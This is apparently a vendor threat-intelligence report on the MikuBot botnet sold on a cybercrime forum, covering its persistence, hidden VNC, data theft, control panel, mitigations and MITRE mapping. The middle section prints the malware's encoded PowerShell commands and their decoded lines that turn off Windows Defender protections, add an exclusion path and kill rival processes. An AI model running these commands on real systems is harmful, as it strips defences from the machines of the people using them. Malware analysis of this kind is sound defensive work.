New Botnet Spies on Victims Using Hidden VNC
During a routine threat-hunting exercise, Cyble Research Labs came across a new malware bot named “MikuBot” in a cyber-crime forum. Mikubot is a malicious bot that steals sensitive data and launches hidden VNC sessions that allow the TA (Threat Actor) to access the victim’s machine remotely, spread through USB, and download and execute other malware.
The bot is written in C++ and works on operating systems ranging from Windows Vista to Windows 11. According to the TA’s post, the malware is standalone and does not require any dependencies to run. Additionally, the TA provides full software support, consultation, new features, crypts, and responsive administration for MikuBot.
The TA has also mentioned in the post that the malware uses encrypted strings, dynamic API functions, unique object names, anti-emulation methods, and tricks to evade detection by antivirus products.
The figure below shows the TA’s MikuBot advertisement on a cybercrime forum with price and feature details.
The TA sells MikuBot with Panel for these (temporary) prices, as listed below:
- $ 1300 (1.5 months)
- $ 2200 (3 months)
The TA has claimed that the bot and panel have the following features in their post.
We have taken the below sample hash for our analysis:
which is a 32-bit executable file compiled with Microsoft Visual C/C++ compiler.
The malware file contains the encrypted payload embedded in the RCData of the resource section. Upon execution, the malware file loads the encrypted payload from the resource section and decrypts it.
The below figure shows the UPX packed payload decrypted from resource “RCData”.
Then, the malware loads the UPX payload and executes it in the memory, as shown below.
Then, the malware unpacks the code in memory and creates a mutex named “CBB536F139732610633691” to ensure that only one instance of malware is running on the victim’s system at any given time.
Next, the malware creates a folder with mutex name in %appdata% location, copies itself using the same name inside the folder, and hides both, as shown below.
After that, it creates a task-scheduler entry with this mutex name, which executes the malware every 10 minutes.
Additionally, the malware drops an internet shortcut file inside the start-up folder to establish auto-launch capability during system restarts.
Upon executing the self-copy file, it launches two PowerShell instances by using the ShellExecuteW() API function with the following Base64 encoded commands.
- powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwAiAA==”
- powershell -Enc KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0AZgBpAGwAdABlAHIAIAAiAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAGwAaQBrAGUAIAAnACUAZABvAG4AYQB0AGUALQBsAGUAdgBlAGwAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAGYAaQBsAHQAZQByACAAIgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIABsAGkAawBlACAAJwAlAGMAdQBkAGEAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQA=”
The first PowerShell instance executes the following commands to disable the Windows Defender’s controlled folder access and potentially unwanted application protection.
Additionally, it adds the %appdata% folder path into Windows Defender’s exclusion list.
- Set-MpPreference -EnableControlledFolderAccess Disabled
- Set-MpPreference -PUAProtection disable
- Add-MpPreference -ExclusionPath “$env:userprofile\AppData\Roaming”
The second PowerShell instance runs the below WMI queries, which terminates the competitors’ miners and bots by checking the strings such as “donate-level” and “cuda” in the command line parameters of the running processes.
- (Get-WmiObject Win32_Process -filter “CommandLine like ‘%donate-level%'”).Terminate()
- (Get-WmiObject Win32_Process -filter “CommandLine like ‘%cuda%'”).Terminate()
The malware then tries to detect the presence of a virtual environment, debugger and antivirus tools by using strings and DLL modules.
Finally, the malware collects the victim’s sensitive information and sends it to the C&C server by using the below URL:
The below figure shows the code snippet used by the malware for sending the stolen information to its C&C server.
The Bot can also perform additional tasks such as spreading via USB, downloading/executing other malware, and launching a Hidden Virtual Network Computing (HVNC) session with the ability to bypass NAT and update/remove the bot from the victim’s machine.
C&C Panel: MIKUBOT
Here are some screenshots that showcase the control panel of MikuBot.
The login page of MikuBot is shown below.
The figure below shows the home page of the MikuBot panel, which demonstrates the bot’s status and operating system along with the region.
The bot menu shows the list of bots that are connected to the C&C server along with the details such as status, UID, IP, country, Windows version, and first/last seen date, as shown below.
The figure below shows the Tasks menu where TA can create a new HNVC task using details such as Bot ID, country code, and IP.
The below figure shows the convenient settings panel, which allows the TA to change the login and database credentials, modify the timeout, etc.
Many cybercriminals purchase malware and add-on services from underground forums to carry out financial fraud without requiring a specific skill set. The sale of malware bots and services has placed individuals and entities at a greater risk of cyber-attacks and financial fraud.
The TAs behind MikuBot are highly active with limited functionalities at the moment. However, they are evolving their methods, and we can expect to see more sophisticated variants of MikuBot in the future. Cyble Research Labs will continue to monitor MikuBot developments and keep our readers aware and informed.
- Avoid downloading files from untrusted sources.
- Clear browsing history and reset passwords at regular intervals.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs.
- Block URLs that could be used to spread the malware, e.g., Torrent/Warez.
- Monitor the beacon on the network level to block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solution on the employees’ systems.
MITRE ATT&CK® Techniques
|Tactic||Technique ID||Technique Name|
|User Execution |
Command and Scripting Interpreter
|Defense Evasion||T1497 |
|Virtualization/Sandbox Evasion |
|Scheduled Task/Job |
Registry Run Keys / Startup Folder
|Discovery||T1082||System Information Discovery|
|Collection||T1005||Data from Local System|
|CNC||T1071||Application Layer Protocol|
Indicator Of Compromise (IOCs)
|MikuBot UPX packed exe|